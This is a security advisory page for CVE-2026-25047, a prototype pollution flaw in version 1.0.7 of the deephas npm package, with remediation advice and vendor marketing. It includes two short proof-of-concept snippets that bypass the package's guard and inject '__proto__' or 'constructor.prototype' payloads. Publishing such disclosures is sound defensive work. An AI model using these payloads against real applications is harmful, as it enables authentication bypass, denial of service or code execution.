Summary
deepHas vulnerable to Prototype Pollution via constructor.prototype
A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.
Details
The vulnerability resides in the add() function and indexer() function implemented within deepHas.js. Although version 1.0.7 attempts to prevent prototype pollution by checking property ownership (e.g., using Object.hasOwnProperty) and by checking against forbidden string usage (using String.prototype.indexOf), this check can be bypassed as shown in the PoC
By doing so, an attacker can inject properties into Object.prototype through a payload such as constructor.prototype.polluted or proto.polluted resulting in prototype pollution.
This issue affects all JavaScript runtimes that rely on npm packages (including Node.js, Deno, and Bun) and is independent of the operating system.
PoC
Steps to reproduce
- Install version 1.0.7 of
deephasusing npm install - Run one of the following code snippets:
//PoC 1
Object.prototype.hasOwnProperty = () => true;
console.log({}.polluted);
const dh = require('deephas');
let obj = {};
dh.set(obj, 'constructor.prototype.polluted', 'yes');
console.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes => the patch is bypassed and prototype pollution occurred
OR
//PoC 2
String.prototype.indexOf = () => -1;
console.log({}.polluted);
const dh = require('deephas');
let obj = {};
dh.set(obj, '__proto__.polluted', 'yes');
console.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes => the patch is bypassed and prototype pollution occurred
Expected behavior
Prototype pollution should be prevented and {} should not gain new properties.
This should be printed on the console:
undefined
undefined OR throw an Error
Actual behavior
Object.prototype is polluted and the property polluted becomes globally accessible.
This is printed on the console:
undefined
yes
Impact
This is a prototype pollution vulnerability, which can have severe security implications depending on how deephas is used by downstream applications. Any application that processes attacker-controlled input using deephas.set may be affected.
It could potentially lead to the following problems:
- Authentication bypass
- Denial of service
- Remote code execution (if polluted property is passed to sinks like eval or child_process)
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Already deployed Kodem?
See it in your environmentNew to Kodem? Get a demo →Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-25047? CVE-2026-25047 is a critical-severity security vulnerability in deephas (npm), affecting versions < 1.0.8. It is fixed in 1.0.8.
- Which versions of deephas are affected by CVE-2026-25047? deephas (npm) versions < 1.0.8 is affected.
- Is there a fix for CVE-2026-25047? Yes. CVE-2026-25047 is fixed in 1.0.8. Upgrade to this version or later.
- Is CVE-2026-25047 exploitable, and should I be worried? Whether CVE-2026-25047 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-25047 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-25047? Upgrade
deephasto 1.0.8 or later.